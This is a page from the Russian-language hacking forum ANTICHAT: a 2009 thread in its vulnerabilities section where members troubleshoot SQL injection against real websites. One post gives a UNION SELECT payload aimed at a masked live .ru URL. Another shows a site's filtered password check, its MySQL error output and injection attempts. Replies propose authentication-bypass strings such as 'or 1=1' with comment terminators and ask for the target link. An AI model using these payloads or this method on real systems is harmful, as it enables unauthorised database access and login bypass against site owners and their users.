HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 559 из 2422 « Первая < 59459509549 555 556 557 558 559 560 561 562 563 56960965910591559 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.02.2009, 23:51
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию
А где можно спросить что значат различные ошибки?
например:
Notice: Undefined index: controller in /www/la2tit01/www/htdocs/cake/dispatcher.php on line 168

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 146

Warning: Cannot modify header information - headers already sent by (output started at /www/la2tit01/www/htdocs/cake/dispatcher.php:168) in /www/la2tit01/www/htdocs/cake/libs/session.php on line 147
 
Ответить с цитированием

  #2  
Старый 23.02.2009, 00:07
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
А где можно спросить что значат различные ошибки?
можно на русский перевести, и все =\

Цитата:
Попробуй начать вот с этого
скорее с этого - google.ru
 
Ответить с цитированием

  #3  
Старый 23.02.2009, 02:23
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Уххх,пасибо ребятишки.До меня быстрее доходит,когда кто-то нормальным человеческим языком объясняет: )))))))))Лавите плюсеги!))
 
Ответить с цитированием

  #4  
Старый 23.02.2009, 10:28
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Код:
http://www.*********.ru/index.php?id=23665+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,00,21,23,23--
Последний раз редактировалось R1dex; 23.02.2009 в 21:58..
 
Ответить с цитированием

  #5  
Старый 23.02.2009, 11:46
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
jokester я не могу сказать какой точно код, так как не вижу его, но могу рассказать тебе историю:

Есть код, допустим он выглядит следующем образом:
Код:
<?
// Начало скрипта
...
// Скрипт получает переменную из формы, допустим <input name="pass" type="password">
$pass = $_POST['pass'];

// Здесь идет проверка/заменна символов у переменной $pass, допустим определим проверку функцией:
function ReRe($re) {
	$re = preg_replace("/'/", "\\", $re);
	$re = preg_replace("/\"/", "\\", $re);
	$re = preg_replace("/</", "", $re);
	$re = preg_replace("/>/", "", $re);
	$re = preg_replace("/\//", "", $re);
	$re = preg_replace("/:/", "", $re);
	$re = preg_replace("/\./", "", $re);
	
	return $re;
	}

// Дальше скрипт выполняет запрос к БД, и вот его у меня нету
...
// Конец скрипта
?>
Если смотреть по выдачи ошибки MySQL, то получается следующее:
Код:
SELECT * FROM passwords where (pwd = '$pass' or pwd = '$pass' or pwd = '$pass')  and dateend>='1235374244'
Т.е. если в поле вставить допустим ' (апостроф), то скрипт выдает следующую ошибку:
Код:
MySQL Error!
------------------------

The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or pwd = '\') and dateend>='1235374381'' at line 1

Error Number:
1064 
SELECT * FROM passwords where (pwd = '\' or pwd = '\' or pwd = '\')  and dateend>='1235374381'
Я в растерянности даже не знаю, что сделать, от безысходности даже пытался апостроф заменить на &apos (теоретически прокатывает) и запрос типа: pass&apos) or 1=1#' принимает радостный вид:
Код:
SELECT * FROM passwords where (pwd = 'pass') or 1=1#\' or pwd = 'pass')' or pwd = 'pass') ')  and dateend>='1235374814'
Но глаз режет информация о синтаксической ошибке:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'pass')' or pwd = 'pass') ') and dateend>='1235374941'' at line 1
Вот такая вот печальная история с трагическим концом. Как думаете дети, в чем автор допустил ошибку?
 
Ответить с цитированием

  #6  
Старый 23.02.2009, 12:05
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Цитата:
Сообщение от it's mу  
Как думаете дети, в чем автор допустил ошибку?
Я хоть и не детя но ответ очевиден - в то что не закрыл остальной запрос, например:
pass&apos) or 1=1+--+
 
Ответить с цитированием

  #7  
Старый 23.02.2009, 15:50
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):
Цитата:
SELECT * FROM passwords where (pwd = ') or 1=1#\' or pwd = ') or 1=1#\') or pwd = ' or 1=1#\') and dateend>='1235374381'
/add
Цитата:
и достоверно мы не знаем, что там за код, могут быть варианты.
имхо в запрос попадает &apos (в html &apos а при просмотре ')

/add2
Shadow6120, линк в студию/пм
Последний раз редактировалось l1ght; 23.02.2009 в 15:57..
 
Ответить с цитированием

  #8  
Старый 24.02.2009, 05:48
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
Цитата:
Сообщение от l1ght  
у меня сайт не пингуется, но если передать переменной значение вида ) or 1=1#', должен получится верный запрос (прошу проверить):


/add

имхо в запрос попадает &apos (в html &apos а при просмотре ')
Дело в том что выше постами было установлено, что апостроф фильтруется, а как я говорил &apos; это сделано для того, что бы красиво было глазам смотреть на "удавшийся" инъект. Вообще спасибо тебе за помощь, но ничего сделать нельзя так как апостроф нужно в любом случаю, что бы удовлетворить логику запроса
 
Ответить с цитированием

  #9  
Старый 23.02.2009, 12:17
it's mу
Banned
Регистрация: 12.02.2009
Сообщений: 73
Провел на форуме:
175651

Репутация: 171
По умолчанию
Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'
 
Ответить с цитированием

  #10  
Старый 23.02.2009, 13:27
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Цитата:
Сообщение от it's mу  
Вообще-то символ # обозначает комментарий до конца строки в MySQL, а мой запрос в прошлом посте был вида: pass&apos) or 1=1#'
Вообще-то символ # прокатывает далеко не везде, а вообще что бы ни заниматься гаданием не плохо бы линк в студию.
 
Ответить с цитированием
Ответ
Страница 559 из 2422 « Первая < 59459509549 555 556 557 558 559 560 561 562 563 56960965910591559 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ